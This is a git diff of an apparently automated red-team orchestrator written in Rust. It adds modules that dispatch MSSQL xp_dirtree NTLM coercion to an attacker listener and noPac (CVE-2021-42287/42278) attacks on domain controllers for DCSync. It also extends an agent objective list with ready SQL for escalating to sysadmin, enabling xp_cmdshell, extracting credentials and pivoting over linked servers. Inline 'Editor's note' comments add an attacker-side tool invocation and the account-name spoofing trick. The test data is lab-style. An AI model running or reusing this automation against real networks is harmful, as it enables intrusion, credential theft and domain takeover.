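+// only and is not referenced elsewhere in this module.
+#[allow(dead_code)]
+fn xp_dirtree_probe(listener_ip: &str) -> String {
+    // Only the host part of the UNC path matters for the handshake we want to
+    // capture; share and file names are arbitrary.
+    format!(r"EXEC master.sys.xp_dirtree '\\{listener_ip}\x', 1, 1;")
+}
+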
+/// Monitors for MSSQL servers and dispatches xp_dirtree NTLM coercion.
+/// Interval: 45s.
+pub async fn auto_mssql_coercion(dispatcher: Arc<Dispatcher>, mut shutdown: watch::Receiver<bool>) {
+    let mut interval = tokio::time::interval(Duration::from_secs(45));
+    interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay);
+
+    loop {
+        tokio::select! {
+            _ = interval.tick() => {},
+            _ = shutdown.changed() => break,
+        }
+        if *shutdown.borrow() {
+            break;
+        }
+
+        if !dispatcher.is_technique_allowed("mssql_coercion") {
+            continue;
+        }
+
+        let listener = match dispatcher.config.listener_ip.as_deref() {
+            Some(ip) => ip.to_string(),
+            None => continue,
+        };
+
+        let work: Vec<MssqlCoercionWork> = {
+            let state = dispatcher.state.read().await;
+            collect_mssql_coercion_work(&state, &listener)
+        };
+
+        for item in work {
+            let payload = json!({
+                "technique": "mssql_ntlm_coercion",
+                "target_ip": item.target_ip,
+                "listener_ip": item.listener,
+                "credential": {
+                    "username": item.credential.username,
+                    "password": item.credential.password,
+                    "domain": item.credential.domain,
+                },
+            });
+
+            let priority = dispatcher.effective_priority("mssql_coercion");
+            match dispatcher
+                .throttled_submit("coercion", "coercion", payload, priority)
+                .await
+            {
+                Ok(Some(task_id)) => {
+                    info!(
+                        task_id = %task_id,
+                        target = %item.target_ip,
+                        "MSSQL xp_dirtree NTLM coercion dispatched"
+                    );
+
+                    dispatcher
+                        .state
+                        .write()
+                        .await
+                        .mark_processed(DEDUP_MSSQL_COERCION, item.dedup_key.clone());
+                    let _ = dispatcher
+                        .state
+                        .persist_dedup(&dispatcher.queue, DEDUP_MSSQL_COERCION, &item.dedup_key)
+                        .await;
+                }
+                Ok(None) => {
+                    debug!(target = %item.target_ip, "MSSQL coercion task deferred");
+                }
+                Err(e) => {
+                    warn!(err = %e, target = %item.target_ip, "Failed to dispatch MSSQL coercion");
+                }
+            }
+        }
+    }
+}
+
+/// Collect MSSQL coercion work items from the current state.
+///
+/// Extracted from the async loop so it can be unit-tested without a
+/// `Dispatcher` or real async runtime scaffolding.
+fn collect_mssql_coercion_work(
+    state: &crate::orchestrator::state::StateInner,
+    listener: &str,
+) -> Vec<MssqlCoercionWork> {
+    if state.credentials.is_empty() {
+        return Vec::new();
+    }
+
+    let mut items = Vec::new();
+
+    for vuln in state.discovered_vulnerabilities.values() {
+        if vuln.vuln_type.to_lowercase() != "mssql_access" {
+            continue;
+        }
+
+        let target_ip = vuln
+            .details
+            .get("target_ip")
+            .and_then(|v| v.as_str())
+            .unwrap_or(&vuln.target);
+
+        if target_ip.is_empty() {
+            continue;
+        }
+
+        let dedup_key = format!("mssql_coerce:{target_ip}");
+        if state.is_processed(DEDUP_MSSQL_COERCION, &dedup_key) {
+            continue;
+        }
+
+        let domain = vuln
+            .details
+            .get("domain")
+            .and_then(|v| v.as_str())
+            .unwrap_or("")
+            .to_string();
+
+        let cred = state
+            .credentials
+            .iter()
+            .find(|c| !domain.is_empty() && c.domain.to_lowercase() == domain.to_lowercase())
+            .or_else(|| state.credentials.first())
+            .cloned();
+
+        let cred = match cred {
+            Some(c) => c,
+            None => continue,
+        };
+
+        items.push(MssqlCoercionWork {
+            dedup_key,
+            target_ip: target_ip.to_string(),
+            listener: listener.to_string(),
+            credential: cred,
+        });
+    }
+
+    items
+}
+
+struct MssqlCoercionWork {
+    dedup_key: String,
+    target_ip: String,
+    listener: String,
+    credential: ares_core::models::Credential,
+}
+
+#[cfg(test)]
+mod tests {
+    use super::*;
+
+    #[test]
+    fn dedup_key_format() {
+        let key = format!("mssql_coerce:{}", "192.168.58.22");
+        assert_eq!(key, "mssql_coerce:192.168.58.22");
+    }
+
+    #[test]
+    fn dedup_set_name() {
+        assert_eq!(DEDUP_MSSQL_COERCION, "mssql_coercion");
+    }
+
+    #[test]
+    fn mssql_access_vuln_type_matching() {
+        assert_eq!("mssql_access".to_lowercase(), "mssql_access");
+        assert_ne!("smb_signing_disabled".to_lowercase(), "mssql_access");
+    }
+
+    #[test]
+    fn target_ip_from_vuln_details() {
+        let details = serde_json::json!({"target_ip": "192.168.58.22"});
+        let target = details
.get("target_ip") + .and_then(|v| v.as_str()) + .unwrap_or("fallback"); + assert_eq!(target, "192.168.58.22"); + } + + #[test] + fn target_ip_fallback_to_vuln_target() { + let details = serde_json::json!({}); + let fallback = "192.168.58.10"; + let target = details + .get("target_ip") + .and_then(|v| v.as_str()) + .unwrap_or(fallback); + assert_eq!(target, "192.168.58.10"); + } + + #[test] + fn credential_domain_matching() { + let domain = "contoso.local".to_string(); + let cred_domain = "CONTOSO.LOCAL"; + let matches = !domain.is_empty() && cred_domain.to_lowercase() == domain.to_lowercase(); + assert!(matches); + } + + #[test] + fn credential_domain_empty_no_match() { + let domain = "".to_string(); + let cred_domain = "contoso.local"; + let matches = !domain.is_empty() && cred_domain.to_lowercase() == domain.to_lowercase(); + assert!(!matches); + } + + #[test] + fn mssql_coercion_payload_structure() { + let payload = serde_json::json!({ + "technique": "mssql_ntlm_coercion", + "target_ip": "192.168.58.22", + "listener_ip": "192.168.58.100", + "credential": { + "username": "sa", + "password": "P@ssw0rd!", + "domain": "contoso.local", + }, + }); + assert_eq!(payload["technique"], "mssql_ntlm_coercion"); + assert_eq!(payload["target_ip"], "192.168.58.22"); + assert_eq!(payload["listener_ip"], "192.168.58.100"); + assert_eq!(payload["credential"]["username"], "sa"); + } + + #[test] + fn domain_extraction_from_vuln() { + let details = serde_json::json!({"domain": "contoso.local"}); + let domain = details + .get("domain") + .and_then(|v| v.as_str()) + .unwrap_or("") + .to_string(); + assert_eq!(domain, "contoso.local"); + + let details2 = serde_json::json!({}); + let domain2 = details2 + .get("domain") + .and_then(|v| v.as_str()) + .unwrap_or("") + .to_string(); + assert_eq!(domain2, ""); + } + + #[test] + fn mssql_coercion_work_fields() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "sa".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + let work = MssqlCoercionWork { + dedup_key: "mssql_coerce:192.168.58.22".into(), + target_ip: "192.168.58.22".into(), + listener: "192.168.58.100".into(), + credential: cred, + }; + assert_eq!(work.target_ip, "192.168.58.22"); + assert_eq!(work.listener, "192.168.58.100"); + } + + // --- collect_mssql_coercion_work integration tests --- + + use crate::orchestrator::state::SharedState; + + fn make_cred(user: &str, domain: &str) -> ares_core::models::Credential { + ares_core::models::Credential { + id: format!("c-{user}"), + username: user.into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: domain.into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + } + } + + fn make_vuln( + id: &str, + vuln_type: &str, + target: &str, + details: serde_json::Value, + ) -> ares_core::models::VulnerabilityInfo { + let details_map: std::collections::HashMap = + serde_json::from_value(details).unwrap_or_default(); + ares_core::models::VulnerabilityInfo { + vuln_id: id.into(), + vuln_type: vuln_type.into(), + target: target.into(), + discovered_by: "test".into(), + discovered_at: chrono::Utc::now(), + details: details_map, + recommended_agent: String::new(), + priority: 5, + } + } + + #[tokio::test] + async fn collect_empty_state_returns_nothing() { + let shared = SharedState::new("test".into()); + let state 
= shared.read().await; + let work = collect_mssql_coercion_work(&state, "192.168.58.100"); + assert!(work.is_empty()); + } + + #[tokio::test] + async fn collect_no_vulns_with_creds_returns_nothing() { + let shared = SharedState::new("test".into()); + { + let mut state = shared.write().await; + state.credentials.push(make_cred("sa", "contoso.local")); + } + let state = shared.read().await; + let work = collect_mssql_coercion_work(&state, "192.168.58.100"); + assert!(work.is_empty()); + } + + #[tokio::test] + async fn collect_mssql_access_vuln_produces_work() { + let shared = SharedState::new("test".into()); + { + let mut state = shared.write().await; + state.credentials.push(make_cred("sa", "contoso.local")); + state.discovered_vulnerabilities.insert( + "v1".into(), + make_vuln( + "v1", + "mssql_access", + "192.168.58.22", + json!({"target_ip": "192.168.58.22", "domain": "contoso.local"}), + ), + ); + } + let state = shared.read().await; + let work = collect_mssql_coercion_work(&state, "192.168.58.100"); + assert_eq!(work.len(), 1); + assert_eq!(work[0].target_ip, "192.168.58.22"); + assert_eq!(work[0].listener, "192.168.58.100"); + assert_eq!(work[0].dedup_key, "mssql_coerce:192.168.58.22"); + assert_eq!(work[0].credential.username, "sa"); + assert_eq!(work[0].credential.domain, "contoso.local"); + } + + #[tokio::test] + async fn collect_skips_non_mssql_vulns() { + let shared = SharedState::new("test".into()); + { + let mut state = shared.write().await; + state.credentials.push(make_cred("sa", "contoso.local")); + state.discovered_vulnerabilities.insert( + "v1".into(), + make_vuln( + "v1", + "smb_signing_disabled", + "192.168.58.22", + json!({"target_ip": "192.168.58.22"}), + ), + ); + } + let state = shared.read().await; + let work = collect_mssql_coercion_work(&state, "192.168.58.100"); + assert!(work.is_empty()); + } + + #[tokio::test] + async fn collect_dedup_skips_already_processed() { + let shared = SharedState::new("test".into()); + { + let mut state = shared.write().await; + state.credentials.push(make_cred("sa", "contoso.local")); + state.discovered_vulnerabilities.insert( + "v1".into(), + make_vuln( + "v1", + "mssql_access", + "192.168.58.22", + json!({"target_ip": "192.168.58.22", "domain": "contoso.local"}), + ), + ); + state.mark_processed(DEDUP_MSSQL_COERCION, "mssql_coerce:192.168.58.22".into()); + } + let state = shared.read().await; + let work = collect_mssql_coercion_work(&state, "192.168.58.100"); + assert!(work.is_empty()); + } + + #[tokio::test] + async fn collect_target_ip_falls_back_to_vuln_target() { + let shared = SharedState::new("test".into()); + { + let mut state = shared.write().await; + state.credentials.push(make_cred("sa", "contoso.local")); + state.discovered_vulnerabilities.insert( + "v1".into(), + make_vuln("v1", "mssql_access", "192.168.58.30", json!({})), + ); + } + let state = shared.read().await; + let work = collect_mssql_coercion_work(&state, "192.168.58.100"); + assert_eq!(work.len(), 1); + assert_eq!(work[0].target_ip, "192.168.58.30"); + } + + #[tokio::test] + async fn collect_skips_empty_target_ip() { + let shared = SharedState::new("test".into()); + { + let mut state = shared.write().await; + state.credentials.push(make_cred("sa", "contoso.local")); + state.discovered_vulnerabilities.insert( + "v1".into(), + make_vuln("v1", "mssql_access", "", json!({"target_ip": ""})), + ); + } + let state = shared.read().await; + let work = collect_mssql_coercion_work(&state, "192.168.58.100"); + assert!(work.is_empty()); + } + + #[tokio::test] + async fn 
collect_prefers_domain_matching_credential() { + let shared = SharedState::new("test".into()); + { + let mut state = shared.write().await; + state.credentials.push(make_cred("admin", "fabrikam.local")); + state.credentials.push(make_cred("sa", "contoso.local")); + state.discovered_vulnerabilities.insert( + "v1".into(), + make_vuln( + "v1", + "mssql_access", + "192.168.58.22", + json!({"target_ip": "192.168.58.22", "domain": "contoso.local"}), + ), + ); + } + let state = shared.read().await; + let work = collect_mssql_coercion_work(&state, "192.168.58.100"); + assert_eq!(work.len(), 1); + assert_eq!(work[0].credential.username, "sa"); + assert_eq!(work[0].credential.domain, "contoso.local"); + } + + #[tokio::test] + async fn collect_falls_back_to_first_cred_when_no_domain_match() { + let shared = SharedState::new("test".into()); + { + let mut state = shared.write().await; + state.credentials.push(make_cred("admin", "fabrikam.local")); + state.discovered_vulnerabilities.insert( + "v1".into(), + make_vuln( + "v1", + "mssql_access", + "192.168.58.22", + json!({"target_ip": "192.168.58.22", "domain": "contoso.local"}), + ), + ); + } + let state = shared.read().await; + let work = collect_mssql_coercion_work(&state, "192.168.58.100"); + assert_eq!(work.len(), 1); + assert_eq!(work[0].credential.username, "admin"); + } + + #[tokio::test] + async fn collect_falls_back_to_first_cred_when_domain_empty() { + let shared = SharedState::new("test".into()); + { + let mut state = shared.write().await; + state.credentials.push(make_cred("sa", "contoso.local")); + state.discovered_vulnerabilities.insert( + "v1".into(), + make_vuln( + "v1", + "mssql_access", + "192.168.58.22", + json!({"target_ip": "192.168.58.22"}), + ), + ); + } + let state = shared.read().await; + let work = collect_mssql_coercion_work(&state, "192.168.58.100"); + assert_eq!(work.len(), 1); + assert_eq!(work[0].credential.username, "sa"); + } + + #[tokio::test] + async fn collect_multiple_vulns_produce_multiple_work_items() { + let shared = SharedState::new("test".into()); + { + let mut state = shared.write().await; + state.credentials.push(make_cred("sa", "contoso.local")); + state.discovered_vulnerabilities.insert( + "v1".into(), + make_vuln( + "v1", + "mssql_access", + "192.168.58.22", + json!({"target_ip": "192.168.58.22", "domain": "contoso.local"}), + ), + ); + state.discovered_vulnerabilities.insert( + "v2".into(), + make_vuln( + "v2", + "mssql_access", + "192.168.58.23", + json!({"target_ip": "192.168.58.23", "domain": "contoso.local"}), + ), + ); + } + let state = shared.read().await; + let work = collect_mssql_coercion_work(&state, "192.168.58.100"); + assert_eq!(work.len(), 2); + let ips: std::collections::HashSet<&str> = + work.iter().map(|w| w.target_ip.as_str()).collect(); + assert!(ips.contains("192.168.58.22")); + assert!(ips.contains("192.168.58.23")); + } + + #[tokio::test] + async fn collect_case_insensitive_vuln_type() { + let shared = SharedState::new("test".into()); + { + let mut state = shared.write().await; + state.credentials.push(make_cred("sa", "contoso.local")); + state.discovered_vulnerabilities.insert( + "v1".into(), + make_vuln( + "v1", + "MSSQL_ACCESS", + "192.168.58.22", + json!({"target_ip": "192.168.58.22"}), + ), + ); + } + let state = shared.read().await; + let work = collect_mssql_coercion_work(&state, "192.168.58.100"); + assert_eq!(work.len(), 1); + } + + #[tokio::test] + async fn collect_case_insensitive_domain_matching() { + let shared = SharedState::new("test".into()); + { + let mut state = 
shared.write().await; + state.credentials.push(make_cred("sa", "CONTOSO.LOCAL")); + state.discovered_vulnerabilities.insert( + "v1".into(), + make_vuln( + "v1", + "mssql_access", + "192.168.58.22", + json!({"target_ip": "192.168.58.22", "domain": "contoso.local"}), + ), + ); + } + let state = shared.read().await; + let work = collect_mssql_coercion_work(&state, "192.168.58.100"); + assert_eq!(work.len(), 1); + assert_eq!(work[0].credential.username, "sa"); + } + + #[tokio::test] + async fn collect_partial_dedup_only_skips_processed() { + let shared = SharedState::new("test".into()); + { + let mut state = shared.write().await; + state.credentials.push(make_cred("sa", "contoso.local")); + state.discovered_vulnerabilities.insert( + "v1".into(), + make_vuln( + "v1", + "mssql_access", + "192.168.58.22", + json!({"target_ip": "192.168.58.22"}), + ), + ); + state.discovered_vulnerabilities.insert( + "v2".into(), + make_vuln( + "v2", + "mssql_access", + "192.168.58.23", + json!({"target_ip": "192.168.58.23"}), + ), + ); + state.mark_processed(DEDUP_MSSQL_COERCION, "mssql_coerce:192.168.58.22".into()); + } + let state = shared.read().await; + let work = collect_mssql_coercion_work(&state, "192.168.58.100"); + assert_eq!(work.len(), 1); + assert_eq!(work[0].target_ip, "192.168.58.23"); + } + + #[tokio::test] + async fn collect_listener_propagated_to_work() { + let shared = SharedState::new("test".into()); + { + let mut state = shared.write().await; + state.credentials.push(make_cred("sa", "contoso.local")); + state.discovered_vulnerabilities.insert( + "v1".into(), + make_vuln( + "v1", + "mssql_access", + "192.168.58.22", + json!({"target_ip": "192.168.58.22"}), + ), + ); + } + let state = shared.read().await; + let work = collect_mssql_coercion_work(&state, "192.168.58.50"); + assert_eq!(work.len(), 1); + assert_eq!(work[0].listener, "192.168.58.50"); + } + + #[tokio::test] + async fn collect_mixed_vuln_types_only_mssql_access() { + let shared = SharedState::new("test".into()); + { + let mut state = shared.write().await; + state.credentials.push(make_cred("sa", "contoso.local")); + state.discovered_vulnerabilities.insert( + "v1".into(), + make_vuln( + "v1", + "mssql_access", + "192.168.58.22", + json!({"target_ip": "192.168.58.22"}), + ), + ); + state.discovered_vulnerabilities.insert( + "v2".into(), + make_vuln( + "v2", + "constrained_delegation", + "192.168.58.23", + json!({"target_ip": "192.168.58.23"}), + ), + ); + state.discovered_vulnerabilities.insert( + "v3".into(), + make_vuln( + "v3", + "mssql_impersonation", + "192.168.58.24", + json!({"target_ip": "192.168.58.24"}), + ), + ); + } + let state = shared.read().await; + let work = collect_mssql_coercion_work(&state, "192.168.58.100"); + assert_eq!(work.len(), 1); + assert_eq!(work[0].target_ip, "192.168.58.22"); + } + + #[tokio::test] + async fn collect_vuln_with_empty_target_and_no_detail_ip_skipped() { + let shared = SharedState::new("test".into()); + { + let mut state = shared.write().await; + state.credentials.push(make_cred("sa", "contoso.local")); + state.discovered_vulnerabilities.insert( + "v1".into(), + make_vuln("v1", "mssql_access", "", json!({"domain": "contoso.local"})), + ); + } + let state = shared.read().await; + let work = collect_mssql_coercion_work(&state, "192.168.58.100"); + assert!(work.is_empty()); + } +} diff --git a/ares-cli/src/orchestrator/automation/mssql_exploitation.rs b/ares-cli/src/orchestrator/automation/mssql_exploitation.rs index 8c2ab558..aeaea38b 100644 --- 
a/ares-cli/src/orchestrator/automation/mssql_exploitation.rs
+++ b/ares-cli/src/orchestrator/automation/mssql_exploitation.rs
@@ -21,7 +21,7 @@ use tracing::{debug, info, warn};
 use crate::orchestrator::dispatcher::Dispatcher;
 
 /// Dedup key prefix for MSSQL deep exploitation.
-const DEDUP_MSSQL_DEEP: &str = "mssql_deep";
+pub(crate) const DEDUP_MSSQL_DEEP: &str = "mssql_deep";
 
 /// Monitors for exploited MSSQL vulns and dispatches follow-up exploitation.
 /// Interval: 30s.
@@ -83,8 +83,18 @@ pub async fn auto_mssql_exploitation(
             .to_string();
 
         // Find a credential for MSSQL access.
-        // Prefer creds for the target domain, fall back to any cred.
-        let credential = state
+        // When the target domain is known, prefer a credential from
+        // that domain (cross-forest NTLM auth otherwise falls through
+        // to Guest, e.g. jdoe@contoso.local → FABRIKAM\Guest on
+        // fabrikam.local SQLEXPRESS).
+        //
+        // For `mssql_linked_server` vulns, fall back to a trusted-domain
+        // credential when no same-domain cred exists: the link hop
+        // executes via stored login mapping on the remote side, so
+        // any cred that authenticates to the source server is fine
+        // (e.g., a child cred lands on sql-link01, then EXEC AT
+        // [SQL01] runs as fabrikam\sql_svc via the stored mapping).
+        let same_domain = state
             .credentials
             .iter()
             .find(|c| {
@@ -93,13 +103,21 @@ pub async fn auto_mssql_exploitation(
                     && (domain.is_empty()
                         || c.domain.to_lowercase() == domain.to_lowercase())
             })
-            .or_else(|| {
-                state.credentials.iter().find(|c| {
-                    !c.password.is_empty()
-                        && !state.is_credential_quarantined(&c.username, &c.domain)
-                })
-            })
             .cloned();
+        let credential = same_domain.or_else(|| {
+            if domain.is_empty() {
+                state
+                    .credentials
+                    .iter()
+                    .find(|c| {
+                        !c.password.is_empty()
+                            && !state.is_credential_quarantined(&c.username, &c.domain)
+                    })
+                    .cloned()
+            } else {
+                state.find_trust_credential(&domain)
+            }
+        });
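+        // Editor's note (illustrative, attacker-side view of the Guest
+        // fallthrough the comment above describes -- the exact tool
+        // invocation is an assumption):
+        //   mssqlclient.py contoso.local/jdoe:'...'@sql.fabrikam.local -windows-auth
+        //   SQL> SELECT SYSTEM_USER;   -- returns FABRIKAM\Guest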
 
        if credential.is_none() {
            debug!(
@@ -142,9 +160,17 @@
             "objectives": [
                 "Enable xp_cmdshell and execute whoami to confirm code execution",
                 "Try EXECUTE AS LOGIN = 'sa' if current user is not sysadmin",
+                "Enumerate ALL impersonation privileges: SELECT distinct b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE'",
+                "For each impersonatable login, try EXECUTE AS LOGIN = '<login>' and check IS_SRVROLEMEMBER('sysadmin')",
+                "Check database-level impersonation: SELECT * FROM sys.database_permissions WHERE permission_name = 'IMPERSONATE'",
+                "Try EXECUTE AS USER = 'dbo' in each database (master, msdb, tempdb) for db_owner escalation",
+                "Check if any database has TRUSTWORTHY = ON: SELECT name, is_trustworthy_on FROM sys.databases WHERE is_trustworthy_on = 1",
                 "Extract credentials via xp_cmdshell (e.g., whoami /priv, reg query for autologon)",
                 "Check for SeImpersonatePrivilege for potato escalation",
-                "Enumerate linked servers for lateral movement",
+                "Enumerate linked servers and test RPC execution on each link",
+                "Check who is sysadmin: SELECT name FROM sys.server_principals WHERE IS_SRVROLEMEMBER('sysadmin', name) = 1",
+                "For cross-forest linked-server pivots: enumerate SELECT s.name, s.is_rpc_out_enabled, l.uses_self_credential, l.remote_name FROM sys.servers s LEFT JOIN sys.linked_logins l ON s.server_id = l.server_id; — if `is_rpc_out_enabled=1` and `uses_self_credential=0`, use `mssql_openquery` (rides stored login mapping, bypasses double-hop)",
+                "If `mssql_exec_linked` fails on a cross-forest link with auth errors, retry with `impersonate_user='sa'` to wrap the hop in `EXECUTE AS LOGIN`, or switch to `mssql_openquery`",
             ],
         });
@@ -192,7 +218,7 @@ struct MssqlDeepWork {
 
 /// MSSQL exploitation (follow-up on confirmed MSSQL access).
 pub(crate) fn is_mssql_deep_candidate(vuln_type: &str) -> bool {
     let vtype = vuln_type.to_lowercase();
-    vtype == "mssql_access" || vtype == "mssql_linked_server"
+    vtype == "mssql_access" || vtype == "mssql_linked_server" || vtype == "mssql_impersonation"
 }
 
 /// Extract the target IP from vulnerability details, with fallbacks.
@@ -227,11 +253,12 @@ mod tests {
         assert!(is_mssql_deep_candidate("MSSQL_ACCESS"));
         assert!(is_mssql_deep_candidate("mssql_linked_server"));
         assert!(is_mssql_deep_candidate("MSSQL_LINKED_SERVER"));
+        assert!(is_mssql_deep_candidate("mssql_impersonation"));
+        assert!(is_mssql_deep_candidate("MSSQL_IMPERSONATION"));
     }
 
     #[test]
     fn is_mssql_deep_candidate_negative() {
-        assert!(!is_mssql_deep_candidate("mssql_impersonation"));
         assert!(!is_mssql_deep_candidate("rbcd"));
         assert!(!is_mssql_deep_candidate("esc1"));
         assert!(!is_mssql_deep_candidate(""));
diff --git a/ares-cli/src/orchestrator/automation/nopac.rs b/ares-cli/src/orchestrator/automation/nopac.rs
new file mode 100644
index 00000000..dac662c2
--- /dev/null
+++ b/ares-cli/src/orchestrator/automation/nopac.rs
@@ -0,0 +1,384 @@
+//! auto_nopac -- exploit CVE-2021-42287/CVE-2021-42278 (noPac / SamAccountName
+//! spoofing) when conditions are met.
+//!
+//! noPac creates a computer account, renames it to match a DC, requests a TGT,
+//! then restores the name. The TGT now impersonates the DC, enabling DCSync.
+//! Requires: valid domain credentials, MAQ > 0 (default 10), unpatched DCs.
+//!
+//! The worker has a `nopac` tool that wraps the full chain.
+
+use std::sync::Arc;
+use std::time::Duration;
+
+use serde_json::json;
+use tokio::sync::watch;
+use tracing::{debug, info, warn};
+
+use crate::orchestrator::dispatcher::Dispatcher;
+use crate::orchestrator::state::*;
+
+/// Collect noPac work items from state (pure logic, no async).
+fn collect_nopac_work(state: &StateInner) -> Vec<NopacWork> {
+    if state.credentials.is_empty() {
+        return Vec::new();
+    }
+
+    let mut items = Vec::new();
+
+    for (domain, dc_ip) in &state.all_domains_with_dcs() {
+        // Skip domains we already dominate -- noPac is pointless if we have krbtgt
+        if state.dominated_domains.contains(&domain.to_lowercase()) {
+            continue;
+        }
+
+        // Find a credential for this domain
+        let cred = match state
+            .credentials
+            .iter()
+            .find(|c| c.domain.to_lowercase() == domain.to_lowercase())
+        {
+            Some(c) => c.clone(),
+            None => continue,
+        };
+
+        let dedup_key = format!("nopac:{}:{}", domain.to_lowercase(), dc_ip);
+        if state.is_processed(DEDUP_NOPAC, &dedup_key) {
+            continue;
+        }
+
+        items.push(NopacWork {
+            dedup_key,
+            domain: domain.clone(),
+            dc_ip: dc_ip.clone(),
+            credential: cred,
+        });
+    }
+
+    items
+}
+
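+// Editor's note -- a minimal sketch of the name trick behind CVE-2021-42278:
+// the fake machine account is renamed to the DC's sAMAccountName *without*
+// the trailing '$', so once the TGT is in hand and the name is restored, the
+// KDC resolves the ticket to the DC itself. `spoofed_sam_account_name` is
+// illustrative only; the real chain lives in the worker's `nopac` tool.
+#[allow(dead_code)]
+fn spoofed_sam_account_name(dc_sam_account_name: &str) -> String {
+    // "DC01$" -> "DC01"
+    dc_sam_account_name.trim_end_matches('$').to_string()
+}
+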
+/// Monitors for noPac exploitation opportunities.
+/// Dispatches against each DC+credential pair once.
+/// Interval: 45s (low-priority CVE check).
+pub async fn auto_nopac(dispatcher: Arc<Dispatcher>, mut shutdown: watch::Receiver<bool>) {
+    let mut interval = tokio::time::interval(Duration::from_secs(45));
+    interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay);
+
+    loop {
+        tokio::select! {
+            _ = interval.tick() => {},
+            _ = shutdown.changed() => break,
+        }
+        if *shutdown.borrow() {
+            break;
+        }
+
+        if !dispatcher.is_technique_allowed("nopac") {
+            continue;
+        }
+
+        let work: Vec<NopacWork> = {
+            let state = dispatcher.state.read().await;
+            collect_nopac_work(&state)
+        };
+
+        for item in work {
+            let payload = json!({
+                "technique": "nopac",
+                "target_ip": item.dc_ip,
+                "domain": item.domain,
+                "credential": {
+                    "username": item.credential.username,
+                    "password": item.credential.password,
+                    "domain": item.credential.domain,
+                },
+            });
+
+            let priority = dispatcher.effective_priority("nopac");
+            match dispatcher
+                .throttled_submit("exploit", "privesc", payload, priority)
+                .await
+            {
+                Ok(Some(task_id)) => {
+                    info!(
+                        task_id = %task_id,
+                        dc = %item.dc_ip,
+                        domain = %item.domain,
+                        "noPac (CVE-2021-42287) exploitation dispatched"
+                    );
+
+                    dispatcher
+                        .state
+                        .write()
+                        .await
+                        .mark_processed(DEDUP_NOPAC, item.dedup_key.clone());
+                    let _ = dispatcher
+                        .state
+                        .persist_dedup(&dispatcher.queue, DEDUP_NOPAC, &item.dedup_key)
+                        .await;
+                }
+                Ok(None) => {
+                    debug!(dc = %item.dc_ip, "noPac task deferred by throttler");
+                }
+                Err(e) => {
+                    warn!(err = %e, dc = %item.dc_ip, "Failed to dispatch noPac");
+                }
+            }
+        }
+    }
+}
+
+struct NopacWork {
+    dedup_key: String,
+    domain: String,
+    dc_ip: String,
+    credential: ares_core::models::Credential,
+}
+
+#[cfg(test)]
+mod tests {
+    use super::*;
+
+    #[test]
+    fn dedup_key_format() {
+        let key = format!("nopac:{}:{}", "contoso.local", "192.168.58.10");
+        assert_eq!(key, "nopac:contoso.local:192.168.58.10");
+    }
+
+    #[test]
+    fn dedup_key_normalizes_domain() {
+        let key = format!(
+            "nopac:{}:{}",
+            "CONTOSO.LOCAL".to_lowercase(),
+            "192.168.58.10"
+        );
+        assert_eq!(key, "nopac:contoso.local:192.168.58.10");
+    }
+
+    #[test]
+    fn dedup_set_name() {
+        assert_eq!(DEDUP_NOPAC, "nopac");
+    }
+
+    #[test]
+    fn payload_structure_validation() {
+        let cred = ares_core::models::Credential {
+            id: "c1".into(),
+            username: "admin".into(),
+            password: "P@ssw0rd!".into(), // pragma: allowlist secret
+            domain: "contoso.local".into(),
+            source: "test".into(),
+            is_admin: false,
+            discovered_at: None,
+            parent_id: None,
+            attack_step: 0,
+        };
+
+        let payload = serde_json::json!({
+            "technique": "nopac",
+            "target_ip": "192.168.58.10",
+            "domain": "contoso.local",
+            "credential": {
+                "username": cred.username,
+                "password": cred.password,
+                "domain": cred.domain,
+            },
+        });
+
+        assert_eq!(payload["technique"], "nopac");
+        assert_eq!(payload["target_ip"], "192.168.58.10");
+        assert_eq!(payload["domain"], "contoso.local");
+        assert_eq!(payload["credential"]["username"], "admin");
+        assert_eq!(payload["credential"]["password"], "P@ssw0rd!"); // pragma: allowlist secret
+        assert_eq!(payload["credential"]["domain"], "contoso.local");
+    }
+
+    #[test]
+    fn work_struct_construction() {
+        let cred = ares_core::models::Credential {
+            id: "c1".into(),
+            username: "testuser".into(),
+            password: "P@ssw0rd!".into(), // pragma: allowlist secret
+            domain: "contoso.local".into(),
+            source: "test".into(),
+            is_admin: false,
+            discovered_at: None,
+            parent_id: None,
+            attack_step: 0,
+        };
+
+        let work = NopacWork {
+            dedup_key: "nopac:contoso.local:192.168.58.10".into(),
+            domain: "contoso.local".into(),
+            dc_ip: "192.168.58.10".into(),
+            credential: cred,
+        };
+
+        assert_eq!(work.dedup_key, "nopac:contoso.local:192.168.58.10");
+        assert_eq!(work.domain, "contoso.local");
+        assert_eq!(work.dc_ip, "192.168.58.10");
+        assert_eq!(work.credential.username, "testuser");
+    }
+
+    #[test]
+ fn dedup_key_case_normalization() { + let domain = "CONTOSO.LOCAL"; + let dc_ip = "192.168.58.10"; + let key = format!("nopac:{}:{}", domain.to_lowercase(), dc_ip); + assert_eq!(key, "nopac:contoso.local:192.168.58.10"); + + let domain2 = "Fabrikam.Local"; + let key2 = format!("nopac:{}:{}", domain2.to_lowercase(), "192.168.58.20"); + assert_eq!(key2, "nopac:fabrikam.local:192.168.58.20"); + } + + // --- collect_nopac_work tests --- + + use crate::orchestrator::state::StateInner; + + fn make_cred(username: &str, domain: &str) -> ares_core::models::Credential { + ares_core::models::Credential { + id: uuid::Uuid::new_v4().to_string(), + username: username.to_string(), + password: "P@ssw0rd!".to_string(), // pragma: allowlist secret + domain: domain.to_string(), + source: String::new(), + discovered_at: None, + is_admin: false, + parent_id: None, + attack_step: 0, + } + } + + #[test] + fn collect_empty_state_produces_no_work() { + let state = StateInner::new("test".into()); + let work = collect_nopac_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_no_credentials_produces_no_work() { + let mut state = StateInner::new("test".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + let work = collect_nopac_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_dc_with_matching_cred_produces_work() { + let mut state = StateInner::new("test".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + 